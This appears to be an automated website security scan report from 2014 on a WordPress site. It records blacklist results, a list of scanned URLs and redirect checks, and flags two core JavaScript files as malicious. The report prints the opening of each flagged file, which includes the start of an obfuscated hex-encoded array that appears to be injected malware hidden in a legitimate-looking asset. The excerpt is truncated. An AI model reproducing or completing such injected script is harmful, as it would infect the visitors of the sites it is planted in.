Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=webanalyticsreportingteam.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://webanalyticsreportingteam.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://webanalyticsreportingteam.com/ | 200 OK Content-Length: 51812 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/sample-page | 200 OK Content-Length: 9926 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 1644 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\ Antivirus reports:
| ||
http://webanalyticsreportingteam.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 2122 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form Antivirus reports:
| ||
http://webanalyticsreportingteam.com/wp-admin/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 01 Oct 2014 18:56:58 GMT Pragma: no-cache Location: http://webanalyticsreportingteam.com/wp-login.php?redirect_to=http%3A%2F%2Fwebanalyticsreportingteam.com%2Fwp-admin%2F&reauth=1 Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Wed, 01 Oct 2014 18:57:00 GMT | clean |
http://webanalyticsreportingteam.com/wp-login.php?redirect_to=http%3a%2f%2fwebanalyticsreportingteam.com%2fwp-admin%2f&reauth=1 | 200 OK Content-Length: 2340 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/wp-login.php?action=lostpassword | 200 OK Content-Length: 1970 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/wp-login.php | 200 OK Content-Length: 2340 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/test404page.js | 404 Not Found Content-Length: 3890 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/altin-fiyatlari.html | 200 OK Content-Length: 12853 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/tatil.html | 200 OK Content-Length: 12517 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/kamerali-sohbet.html | 200 OK Content-Length: 13873 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/lazer-epilasyon.html | 200 OK Content-Length: 17601 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/maurers-zayiflama.html | 200 OK Content-Length: 12549 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/biber-hapi.html | 200 OK Content-Length: 12728 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/fx15.html | 200 OK Content-Length: 14160 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: webanalyticsreportingteam.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 18:56:54 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 51812
Content-Type: text/html; charset=UTF-8
X-Pingback: http://webanalyticsreportingteam.com/xmlrpc.php
...51812 bytes of data.
GET / HTTP/1.1
Host: webanalyticsreportingteam.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 18:56:54 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 51812
Content-Type: text/html; charset=UTF-8
X-Pingback: http://webanalyticsreportingteam.com/xmlrpc.php
...51812 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: webanalyticsreportingteam.com
Referer: http://www.google.com/search?q=webanalyticsreportingteam.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: webanalyticsreportingteam.com
Referer: http://www.google.com/search?q=webanalyticsreportingteam.com
Result:
The result is similar to the first query. There are no suspicious redirects found.